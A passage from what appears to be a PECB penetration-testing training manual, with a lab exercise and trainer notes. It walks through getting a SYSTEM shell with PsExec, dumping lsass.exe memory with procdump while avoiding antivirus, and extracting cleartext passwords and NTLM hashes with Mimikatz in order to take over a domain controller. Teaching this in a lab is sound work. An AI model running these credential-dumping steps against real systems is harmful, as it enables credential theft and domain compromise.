process a SYSTEM user is required. The following command should be used to get a
SYSTEM shell:
Psexec –i –s –d cmd

Do a ‘whoami’ to confirm that it worked before continuing

www.pecb.com
35
4. Run the following procdump command to dump the lsass.exe process
memory. Using this method, no ‘hacking tools’ are uploaded to the target machine
avoiding triggering AV:

procdump.exe -accepteula -ma lsass.exe target.dmp

5. Copy the output dump file back over the mount point created in step 2, and
launch Mimikatz locally. Remember to have the same architecture (x86 or x64) as
the system the process dump came from. Use the following commands within
Mimikatz to get cleartext passwords from the process dump:

mimikatz # sekurlsa::minidump target.dmp

Switch to minidump
mimikatz # sekurlsa::logonPasswords

Authentication Id: 0; 141237

User Name: sekur_000
Domain: WINDOWS-8
msv:
* Username: sekurlsa@live.fr
* Domain: MicrosoftAccount
* LM: d0e9aee149655a6075e4540af1f22d3b
* NTLM: cc36cf7a8514893efccd332446158b1a
tspkg:
* Username: sekurlsa@live.fr
* Domain: MicrosoftAccount
* Password: waza1234 /
WDigest:
* Username: sekurlsa@live.fr
* Domain: MicrosoftAccount
* Password: waza1234 /
livessp:
* Username: sekurlsa@live.fr
* Domain: ps: password
* Password: waza1234 /
kerberos:
ssp:

www.pecb.com
36
6. This should reveal the password of a domain admin account that can then be
used to login to the DC and gain control over it

Note for trainers:

The most reliable way to ensure the Windows 8 system will have the cached
password of domain admin account is to map a share from the DC using the domain
admin credentials (jack.russell).

If you need to activate the local Administrator account on Windows 8.1 (It comes
deactivated by Default on fresh installs) type the following

C:\> net user administrator /active:yes

(Remember to run the command line as an Administrator)

Other alternatives to PSEXEC would be using WMI to run commands remotely,

though advanced Windows Pen Testing and exploitation techniques will be covered
in more specialised courses in the future.

www.pecb.com
37